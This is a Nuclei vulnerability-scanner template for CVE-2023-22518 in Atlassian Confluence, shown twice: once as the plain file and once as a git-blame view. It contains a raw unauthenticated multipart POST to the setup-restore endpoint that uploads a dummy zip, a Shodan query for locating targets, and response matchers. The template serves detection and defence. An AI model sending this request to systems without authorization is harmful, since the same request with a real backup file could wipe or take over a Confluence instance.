nuclei-templates/http/cves/2023/CVE-2023-22518.yaml

id: CVE-2023-22518

info:
  name: Atlassian Confluence Server - Improper Authorization
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
    Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
  reference:
    - https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907
    - https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/
    - https://jira.atlassian.com/browse/CONFSERVER-93142
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22518
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-22518
    epss-score: 0.00054
    epss-percentile: 0.20098
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: confluence_data_center
    shodan-query: http.component:"Atlassian Confluence"
    note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.
  tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive

http:
  - raw:
      - |
        POST /json/setup-restore.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
        X-Atlassian-Token: no-check

        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="buildIndex"

        false
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"

        {{randstr}}
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7
        Content-Disposition: form-data; name="edit"

        Upload and import
        ------WebKitFormBoundaryT3yekvo0rGaL9QR7--

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"
        condition: and

# digest: 490a0046304402201eefbb1a060628fc328b496c4001f6d9bbc868a2bb3c379edb5913061aed0b6502201d773f34bbcd6e76d3b339b3f15bd64dbfdffc0e351293d60ee4350b7ae497a3:922c64590222798bb761d5b6d8e72950
Added CVE-2023-22518 (#8528) 2023-11-02 18:36:47 +00:00			`id: CVE-2023-22518`

			`info:`
			`name: Atlassian Confluence Server - Improper Authorization`
			`author: iamnoooob,rootxharsh,pdresearch`
			`severity: critical`
			`description: \|`
			`All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.`
			`Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.`
			`reference:`
			`- https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907`
			`- https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/`
			`- https://jira.atlassian.com/browse/CONFSERVER-93142`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-22518`
			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`
			`cvss-score: 9.1`
			`cve-id: CVE-2023-22518`
TemplateMan Update [Fri Nov 3 15:51:18 UTC 2023] :robot: 2023-11-03 15:51:18 +00:00			`epss-score: 0.00054`
TemplateMan Update [Mon Nov 6 12:42:20 UTC 2023] :robot: 2023-11-06 12:42:20 +00:00			`epss-percentile: 0.20098`
Added CVE-2023-22518 (#8528) 2023-11-02 18:36:47 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
			`vendor: atlassian`
			`product: confluence_data_center`
			`shodan-query: http.component:"Atlassian Confluence"`
			`note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.`
TemplateMan Update [Fri Nov 3 10:59:12 UTC 2023] :robot: 2023-11-03 10:59:12 +00:00			`tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive`
Added CVE-2023-22518 (#8528) 2023-11-02 18:36:47 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /json/setup-restore.action HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7`
make matcher works! 2023-11-03 09:42:30 +00:00			`X-Atlassian-Token: no-check`
Added CVE-2023-22518 (#8528) 2023-11-02 18:36:47 +00:00
			`------WebKitFormBoundaryT3yekvo0rGaL9QR7`
			`Content-Disposition: form-data; name="buildIndex"`

make matcher works! 2023-11-03 09:42:30 +00:00			`false`
Added CVE-2023-22518 (#8528) 2023-11-02 18:36:47 +00:00			`------WebKitFormBoundaryT3yekvo0rGaL9QR7`
			`Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"`

			`{{randstr}}`
			`------WebKitFormBoundaryT3yekvo0rGaL9QR7`
			`Content-Disposition: form-data; name="edit"`

			`Upload and import`
			`------WebKitFormBoundaryT3yekvo0rGaL9QR7--`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code == 200"`
			`- "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"`
Auto Template Signing [Thu Nov 2 18:40:31 UTC 2023] :robot: 2023-11-02 18:40:31 +00:00			`condition: and`
TemplateMan Update [Mon Nov 6 13:16:28 UTC 2023] :robot: 2023-11-06 13:16:29 +00:00
			`# digest: 490a0046304402201eefbb1a060628fc328b496c4001f6d9bbc868a2bb3c379edb5913061aed0b6502201d773f34bbcd6e76d3b339b3f15bd64dbfdffc0e351293d60ee4350b7ae497a3:922c64590222798bb761d5b6d8e72950`